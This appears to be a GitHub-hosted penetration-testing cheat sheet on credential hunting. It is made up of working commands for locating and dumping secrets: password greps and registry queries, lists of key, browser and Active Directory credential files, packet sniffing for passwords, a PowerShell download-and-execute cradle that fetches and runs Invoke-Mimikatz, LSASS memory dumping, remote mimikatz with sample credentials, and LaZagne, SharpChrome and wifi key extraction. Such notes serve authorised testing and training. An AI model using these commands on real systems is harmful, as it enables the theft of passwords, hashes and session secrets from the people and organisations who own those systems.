Skip to content

Latest commit

 

History

History
189 lines (173 loc) · 5.2 KB

File metadata and controls

189 lines (173 loc) · 5.2 KB

Grep

Grep recursively search for string under path

grep -r  "password" /home/kali/Desktop/10.10.10.152 2>/dev/null

git folder

directory name = .git
python3 git_extract.py gitfilename

Private key

.ssh/id_rsa||id_dsa||id_ecdsa||id_ed25519||id_ecdsa-sk||id_ed25519-sk

bitvise ssh private key path on windows

C:\Users\username\.ssh\id_rsa||id_dsa||id_ecdsa||id_ed25519||id_ecdsa-sk||id_ed25519-sk

Sensitive Directory

/user/.ssh
/home/user/.config
/root/.config

Sensitive files

find *.log, passwd, username, credential
C:\Users\username\Documents
C:\Users\username\Downloads
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
.github folder
setupinfo
setupinfo.bak
*.bak, *.db
*.pdf
*.zip
*.7z
*.gz
*.sitx
*.rar
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Google\Chrome\User Data\Local State
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network
%LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Network\Cookies
%LOCALAPPDATA%\Microsoft\Edge\User Data\Local State
%APPDATA%\Roaming\Microsoft\Protect\<SID> -> DPAPI Keys
%SystemRoot%\NTDS\ntds.dit(Active Directory database)
%SystemRoot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx(Windows event logs)

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml


in all files  
findstr /spin "password" *.*  

Config files

where /R C:\ unattend.xml  
where /R C:\ web.config  
where /R C:\ sysprep.inf  
where /R C:\ sysprep.xml  
where /R C:\ *pass*  

where /R C:\ *vnc.ini  
where /R C:\ *ultravnc.ini  

Registry

reg query HKLM /f password /t REG_SZ /s

#Putty keys
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

### VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"  
reg query "HKCU\Software\TightVNC\Server"  

### Windows autologin  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"  
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"  

### SNMP Parameters  
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"  

### Search for the password in the registry  
reg query HKLM /f password /t REG_SZ /s  
reg query HKCU /f password /t REG_SZ /s

Linux Web Service

Check all the folders and files under var/www/html

tcpdump to capture packets

sudo tcpdump -i lo -A | grep "pass"

History

Linux:

check all user's .bash_history
/home/user/.bash_history

Windows:

(Get-PSReadlineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Password Hash

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Mimikatz - sekurlsa::logonpasswords  
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit  
lsadump::cache  
sekurlsa::tickets
Load mimikatz and run it locally.
$PEBytes = [IO.File]::ReadAllBytes('mimiikatz.exe')  
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "privilege::debug sekurlsa::logonpasswords Arg3 Arg4"
https://github.com/KiritoLoveAsuna/Penetration-Testing/blob/main/Invoke-ReflectivePEInjection.ps1
Procdump to extract hash by mimikatz
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
mimikatz.exe "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit
Run mimikatz remotely
python3 /usr/share/doc/python3-impacket/examples/mimikatz.py oscp.exam/Administrator:December31@192.168.112.147
Mimikatz bypass LSA protection

image

Mimikatz bypass ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

http://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip

Pwdump

It is recommended to extrast hashes using both mimikatz and pwdump

Auto Credential Hunt

. .\SessionGopher.ps1(About
SessionGopher is a PowerShell tool that uses WMI to extract saved session information for remote access tools such as WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop. It can be run remotely or locally.)
Invoke-SessionGopher -Thorough

.\lazagne.exe all

.\SharpChrome.exe logins|cookies|statekeys /unprotect

Wifi Passwords

netsh wlan show profile
netsh wlan show profile ssid key=clear